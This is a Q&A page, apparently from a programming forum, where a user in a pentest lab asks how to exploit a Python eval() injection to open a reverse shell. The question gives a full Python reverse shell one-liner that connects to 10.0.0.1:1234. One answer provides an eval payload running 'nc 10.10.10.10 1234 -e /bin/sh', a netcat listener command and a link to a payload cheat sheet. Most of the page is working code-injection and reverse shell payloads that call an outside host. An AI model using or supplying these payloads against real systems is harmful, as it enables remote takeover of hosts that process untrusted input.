1

I am working on a pentest lab. There is a Python eval() function I need to exploit.

It is like

eval('%s>1',payload)

I need to execute a Python reverse shell script as payload. It is

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

I am trying like

eval('%s >1' "__import__('os').system('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'")

Not sure how to import all those modules and execute it.

Any help appreciated.

Improve this question

2 Answers 2

Reset to default
2

Maybe try like this

"__import__('os').system('nc your_ip port -e /bin/sh')"

like;

First listen port fresh terminal

nc -lvp 1234

after try another terminal:

"__import__('os').system('nc 10.10.10.10 1234 -e /bin/sh')"

"__import__('os').system('YOUR REVERSE SHELL METHOD')"

here's many reverse shell payload : https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

good luck

Improve this answer
Sign up to request clarification or add additional context in comments.

2 Comments

I need to use Python reverse shell.
did u check PayloadsAllTheThings ?
0

Try to include globals() and locals() in the eval (to import into the global scope). This is explained in In Python, why doesn't an import in an exec in a function work?

Also see https://lucumr.pocoo.org/2011/2/1/exec-in-python/ chapter Behind the Scenes of Imports

Improve this answer

1 Comment

eval doesn't allow ; and \n

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.